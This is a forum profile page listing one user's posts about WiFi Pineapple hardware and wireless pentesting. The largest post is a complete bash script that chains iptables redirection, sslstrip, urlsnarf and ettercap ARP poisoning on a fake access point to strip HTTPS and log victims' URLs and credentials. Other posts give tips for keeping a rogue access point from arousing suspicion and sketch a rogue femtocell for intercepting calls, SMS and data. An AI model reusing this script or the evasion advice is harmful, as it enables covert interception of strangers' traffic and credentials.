Jump to content

dwek

Active Members
  • Posts

    11
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

dwek's Achievements

Newbie

Newbie (1/14)

  1. Hi, I’m considering what I can do to increase the efficiency of new engagement recon by performing a more complete wireless survey within the initial engagement contact. Has anyone considered automating the use of an Ubertooth, Yardstick, HackRF and 4G LTE Femto cell to survey a site, to work out if you need to consider Bluetooth, Wifi, commercial or Cell assessments? Or has this already been done? Combining this with general IPV4/6 intenal/external assessments, IPv6 RA/IPv4 arp spoofing and app vuln scans, should give a reasonable start point, followed by standard policy, procedure, internal/external threat/exposure analysis. Any ideas if anyone has automated this or am I back to combing a range of Git scripts? I’ve also considered including a additional HackRf with a down converter to survey the use of sat phone and other SHF comms.
  2. Regrettably I suspect this is the case here. The PSU I used was for a Arduino board, but the intended board appears to have a some regulation. I confirmed the output voltage of other supply on a 10M ohm probe and it is about 17.3V,although on a DC digital multimeter it is 12.5V. I wonder if there is a CCT diagram available to see if I can replace any of the components to resurrect the device.
  3. I suspect you're right with the Mark V, it used to be possible with the old Pineapple. I used the USB many times from a USB battery and directly from a PC USB port. I can imagine the current requirement and possibly the 9V DC source is more important with the Mark V.
  4. Yeah I have read many posts that say it can handle 12V, but the other PSU is definitely a 12V DC with the right polarization according to the label. I'll check the other PSU with a multimeter and oscilloscope, but the supply is new and used with another Arduino board.
  5. Hi all, I accidently connected a 12 V DC supply to my Pineapple and started to smell funky - it smelt like it overheated. Now when I connect the correct power supply, the lights do not turn on. When I connect a USB external charger to the USB on the Pineapple, all the lights flash. As I said... A sad day! Is there anything I can do to replace parts on the PCB to recover the device or purchase a new board? Other than purchasing a new device at the full price, is there any other options? It's one of my favorite multi-function devices. Thanks in advance.
  6. I'm now thinking that it may just be easier to write something that uses urlsnarf, sslstrip and ettercap on the Pineapple. As the Pineapple is a fake AP, I won't need to use any ARP poisoning. Anyone know of anything around? I'm assuming this will also need some port forwarding on for sslstrip to work properly.
  7. Hi, I'm working on a script to leverage the standard WP4.sh script for the Pineapple IV, combined with a MITM SSLstip script. The below is sort of working , but I have issues with the first iptables statement forwarding properly and how URLsnarf & SSLstrip are being passed traffic. I'm also thinking that excluding ARP poisoning the Pineapple might be a good idea,. Any thoughts? It's probably something obvious or just my lack of looking. Either way, I thought I would share what I have got so far. Thanks #!/bin/bash #This script combines the Wireless Pinapple (wp4.sh) and the MITM script v1.0 beta found at #http://360percents.com/posts/automatic-mitm-shell-script/ #define variables echo -n "Input Pineapple Netmask [or ENTER for 255.255.255.0]: " read pineapplenetmask if [[ $pineapplenetmask == '' ]]; then pineapplenetmask=255.255.255.0 #Default netmask for /24 network fi echo -n "Input Pineapple Network [or ENTER for 172.16.42.0/24]: " read pineapplenet if [[ $pineapplenet == '' ]]; then pineapplenet=172.16.42.0/24 # Pineapple network. Default is 172.16.42.0/24 pineapplerange=172.16.42.2-254 # Pineapple network. Default is 172.16.42.2-254 excluding the Pinapple IP fi if [[ $pineapplenet != '172.16.42.0/24' ]]; then pineapplerange=$pineapplenet # If default 172.16.42.0/24 is not selected, provide reduced target scope to ettercap fi echo -n "Input Interface between PC and Pineapple [or ENTER for eth0]: " read pineapplelan if [[ $pineapplelan == '' ]]; then pineapplelan=eth0 # Interface of ethernet cable directly connected to Pineapple fi echo -n "Input Interface between PC and Internet [or ENTER for wlan0]: " read pineapplewan if [[ $pineapplewan == '' ]]; then pineapplewan=wlan0 #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan fi temppineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default echo -n "Input Internet Gateway [or ENTER for $temppineapplegw]: " read pineapplegw if [[ $pineapplegw == '' ]]; then pineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default fi echo -n "Input IP Address of Host PC [or ENTER for 172.16.42.42]: " read pineapplehostip if [[ $pineapplehostip == '' ]]; then pineapplehostip=172.16.42.42 #IP Address of host computer fi echo -n "Input IP Address of Pineapple [or ENTER for 172.16.42.1]: " read pineappleip if [[ $pineappleip == '' ]]; then pineappleip=172.16.42.1 #Thanks Douglas Adams fi #Display settings echo Pineapple connected to: $pineapplelan echo Internet connection from: $pineapplewan echo Internet connection gateway: $pineapplegw echo Host Computer IP: $pineapplehostip echo Pineapple IP: $pineappleip echo Network: $pineapplenet echo Netmask: $pineapplenetmask #Bring up Ethernet Interface directly connected to Pineapple ifconfig $pineapplelan $pineapplehostip netmask $pineapplenetmask up # Enable IP Forwarding echo '1' > /proc/sys/net/ipv4/ip_forward echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to " cat /proc/sys/net/ipv4/ip_forward #clear chains and rules iptables -X iptables -F echo iptables chains and rules cleared #setup IP forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 -j ACCEPT iptables -A FORWARD -i $pineapplewan -o $pineapplelan -s $pineapplenet -m state --state NEW -j ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE echo IP Forwarding Enabled #remove default route route del default echo Default route removed #add default gateway route add default gw $pineapplegw $pineapplewan echo Pineapple Default Gateway Configured #create directory to store session results echo -n "Name of 'Session'? (name of the folder that will be created with all the log files): " read -e SESSION mkdir /root/$SESSION/ # Sslstrip echo "[+] Starting sslstrip" xterm -geometry 75x15+1+200 -T sslstrip -e /pentest/web/sslstrip/sslstrip.py -f -s -k -w /root/$SESSION/$SESSION.log & sleep 2 # urlsnarf echo "[+] Starting urlsnarf" urlsnarf -i $pineapplelan | grep http > /root/$SESSION/$SESSION.txt & sleep 1 # Ettercap echo "" echo "[+] Starting ettercap" xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $pineapplelan -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp:remote /"$pineappleip"/ /"$pineapplerange"/ & cat /proc/sys/net/ipv4/ip_forward iptables -t nat -L sleep 1 #instructions #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan ping -c3 $pineappleip if [ $? -eq 0 ]; then echo "" echo "ICS configuration successful." #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan" #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'" #echo "Enter Pineapple password if prompted" #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan' fi echo "" echo "Browse to http://$pineappleip/pineapple -- Happy Hacking!" echo "" echo "" echo "[+] IMPORTANT" echo -n "After you have finished please close this script and clean up properly by hitting y " echo "" echo "" read WISH echo "" # Clean up sslstrip, ettercap and urlsnarf if [ $WISH = "y" ]; then echo "" echo "[+] Cleaning up and resetting iptables..." killall sslstrip killall ettercap killall urlsnarf killall xterm echo "0" > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain etterlog -p -i /root/$SESSION/$SESSION.eci echo "[+] Clean up successful...Bye!" exit fi exit
  8. Worth a look at this $49 Android device if you are after a cheap environment. http://apc.io/about/ http://www.pcmag.com/article2/0,2817,2404770,00.asp.
  9. Something like this. wiki.thc.org/vodafone
  10. A couple of thoughts. A good start is to change the MAC address so it doesn't give away the default hardware MAC vendor mapping performed by basic scanners. Restrict the aliased SSID's. Don't use the standard Nyan Cat redirects. It's a dead give away. Plan your deployment and predict your outcomes upfront, to optimise your setup and the results. Make sure the back channel works well, so as to reduce the change of any suspicion. I'm playing with different user agents and techniques to see how the pinapple reacts to differing scanning techniques. This is just for my interest... I think the WiFI Pinapple is great.
  11. Hi, Similar to the functionality and deployment methods of the WiFi Pinapple, has anyone considered looking at making a 3G/4G Femtocell? The price of the hardware is getting a lot cheaper and it seems to be a natural evolution of the idea. I.e. Accept all cellular Data, SMS and maybe voice connections. Connect all Internet, SMS and voice calls to free/paid SIP and/or Mobile SIM and/or free WiFi gateway. I assume there are issues to consider with respect to the auth process undertaken by the handset when connecting to a MITM cell, but I assume this can be overcome by using the roaming functionality, which is often used between carriers to provide regional/international flexibility & carrier redundancy. If the Femtocell supported all the global frequencies, this would also provide the ability to review international visitors. Anyway, it was just an idea.
×
×
  • Create New...